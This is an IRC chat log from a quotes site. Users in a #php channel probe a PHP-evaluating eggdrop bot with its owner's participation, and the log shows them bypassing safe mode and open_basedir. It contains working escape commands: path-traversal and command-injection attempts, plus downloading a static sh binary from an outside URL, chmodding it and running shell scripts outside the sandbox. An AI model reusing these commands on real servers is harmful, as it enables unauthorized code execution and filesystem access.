@# Quotes DB     useful, funny, interesting






<0> no, don't listen to jed
<1> first off, you'd need to download a statically linked sh to /home/poutine/safe, then you'd have to make a shell script, and then execute said shell script
<2> you were right
<3> !php $output = shell_exec('ls -l'); echo $output;
<4> Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<2> !php system('x=1;echo $x');
<4> /home/poutine/safe/x=1;echo: not found
<1> not to mention you'd have to find a FreeBSD 4.11 system to get the statically compiled sh from :)
<1> !php system('uname -a'
<1> !php system('uname -a');
<4> Parse error: syntax error, unexpected ';' in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> FreeBSD mudportal2.mudportal.com 4.11-STABLE FreeBSD 4.11-STABLE #1: Thu Jul 7 21:18:56 EDT 2005 poutine@mudportal2.mudportal.com:/usr/obj/usr/src/sys/PRIVATE i386
<2> you copied a uname binary in?
<3> !php phpinfo()
<4> phpinfo()
<4> PHP Version => 5.1.1



<4> System => FreeBSD mudportal2.mudportal.com 4.11-STABLE FreeBSD 4.11-STABLE #1: Thu Jul i386
<4> Build Date => Dec 30 2005 11:46:22
<1> I own MudPortal, I'm not restricted to safe mode and such
<2> oh I see
<1> I think sh/bash/csh is what reads the top line of the script to find out what the interpreter is
<1> something that probably isn't done when openbasedir is in effect
<3> Was MudPortal a complex bot to write, poutine?
<1> no
<2> !php system("../../../usr/bin/id");
<4> Warning: system(): No '..' components allowed in path in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<1> MudPortal is an eggdrop
<1> the PHP module just uses the commandline CLI
<3> CLY?
<3> CLI?
<1> it does some CTCP filtering, user access control, and flood/repeat limiting, but that's about it
<1> t0ke, yes php /home/poutine/safe/raw.php
<1> !php readfile('/home/poutine/safe/raw.php');
<4> <?php
<4> include('/home/poutine/safe/custom.php');
<4> $nick = 'poutine';
<4> $host = '~poutine@cpe-65-185-39-148.columbus.res.rr.com';
<4> $chan = '#php';
<1> etc etc
<2> !php system('\.\./test');
<4> /home/poutine/safe/test: not found
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh")); system("/home/poutine/safe/sh goop.sh");
<4> /home/poutine/safe/sh: permission denied
<3> sweet
<0> !php $p = "/home/poutine/safe"; chmod("$p/sh", "a+x");
<0> !php system("/home/poutine/safe/sh goop.sh");
<4> /home/poutine/safe/sh: permission denied
<0> hm.
<2> !php system('\.\./\.\./\.\./usr/bin/id');
<4> /home/poutine/safe/id: not found
<0> that's just odd
<5> use more slashes
<0> that's a 4.11 sh
<1> ---------- 1 poutine wheel 106828 Mar 6 19:03 sh
<5> i'm sure it will work with enough slashes
<5> lol
<2> !php system('\.\.\/\.\./\.\.\/usr\/bin\/id');
<0> the hell?
<4> /home/poutine/safe/id: not found
<1> try now
<2> guess not
<0> !php system("/home/poutine/safe/sh goop.sh");
<4> goop.sh: Can't open goop.sh: No such file or directory
<0> well, i'm executing sh
<3> !php echo date('d','m','Y');
<0> !php system("/home/poutine/safe/sh ~poutine/safe/goop.sh");
<1> goop.sh has no permissions also
<4> Warning: date() expects at most 2 parameters, 3 given in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> ~poutine/safe/goop.sh: Can't open ~poutine/safe/goop.sh: No such file or directory
<1> try again jed
<0> !php system("/home/poutine/safe/sh ~poutine/safe/goop.sh");
<4> ~poutine/safe/goop.sh: Can't open ~poutine/safe/goop.sh: No such file or directory
<0> !php system("/home/poutine/safe/sh /home/poutine/safe/goop.sh");
<1> just goop.sh
<4> lol
<0> there it is



<3> !php echo date('d,m,Y');
<4> 06,03,2006
<0> !php unlink("/home/poutine/safe/sh");
<0> !php unlink("/home/poutine/safe/goop.sh");
<0> so chmod() is somehow filtered
<0> or we're doing it wrong
<1> !func chmod
<4> chmod (PHP 3, PHP 4, PHP 5) -- Changes file mode
<4> bool chmod ( string filename, int mode )
<4> http://www.php.net/manual/en/function.chmod.php
<0> hm
<5> hmmmm
<5> INT
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh")); chmod("$p/sh", 777);
<0> hmmm, it takes string too according to the documentation
<0> don't question my authority biznatch
<6> 0777 not 777
<6> you need to specify octal
<0> DUR
<6> biotch
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh")); chmod("$p/sh", 0777);
<4> Warning: file_put_contents(/home/poutine/safe/sh): failed to open stream: Permission denied in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<5> chmod("/somedir/somefile", "u+rwx,go+rx"); // string; incorrect
<2> !php system('x || /usr/bin/id');
<4> /home/poutine/safe/x: not found
<5> Note that mode is not automatically assumed to be an octal value, so strings (such as "g+w") will not work properly.
<5> biznatch yourself
<0> ****ing a, they changed it since 4.*
<2> would I have seen the 2nd line?
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh2", file_get_contents("http://jed.bz/sh")); chmod("$p/sh", 0777);
<1> worked
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/lol.sh", "echo lol; cd ../../; pwd\n");
<0> !php $p = "/home/poutine/safe"; chmod("$p/lol.sh", 0777);
<0> !php $p = "/home/poutine/safe"; system("$p/sh2 $p/lol.sh");
<4> /home/poutine/safe/sh2: permission denied
<2> the one chmod was for $p/sh
<6> idd
<0> !php $p = "/home/poutine/safe"; chmod("$p/sh2", 0777);
<0> !php $p = "/home/poutine/safe"; system("$p/sh2 $p/lol.sh");
<4> lol
<4> /usr/home
<1> wow
<0> ut-oh spaghetti-o
<1> well there's open basedir for you
<3> So what have you guys achieved?
<6> root!
<1> bypassed open basedir
<3> what's that mean in layman's, poutine?
<6> hax0rd!
<3> lol
<1> t0ke, he h4x0r3d teh g1bs0n
<3> :D
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/blargh.sh", "ls -l /home/poutine"); chmod("$p/blargh.sh", 0777); system("$p/sh2 $p/blargh.sh");
<4> total 3530
<4> drwxr-xr-x 14 poutine wheel 1536 Mar 6 19:00 eggdrop
<4> -rw-r--r-- 1 poutine wheel 2532694 Mar 22 2005 eggdrop.tar.bz2
<4> drwxr-xr-x 13 poutine wheel 1536 Jul 5 2005 eggdrop1.6.15
<4> drwxr-xr-x 10 poutine wheel 512 Aug 22 2004 eggdrop1.6.17
<1> give me a second jed
<6> you don't need to chmod the shell script if you're going to run it like that (i don't think)
<0> !php $p = "/home/poutine/safe"; unlink("$p/sh"); unlink("$p/sh2"); foreach(glob("$p/*.sh") as $f) unlink($f);
<4> Warning: unlink(/home/poutine/safe/sh): No such file or directory in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> Warning: unlink(/home/poutine/safe/sh2): No such file or directory in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<0> neato, he nuked 'em
<0> saved me some trouble
<0> now before you kids get ideas
<2> wouldn't be hard to build a static sh on my own freebsd account, I wanted to find a syntax trick, though
<0> you know
<0> it really feels like i accomplished something today
<0> now i'm happy
<3> Well done!
<1> !php echo 'test';

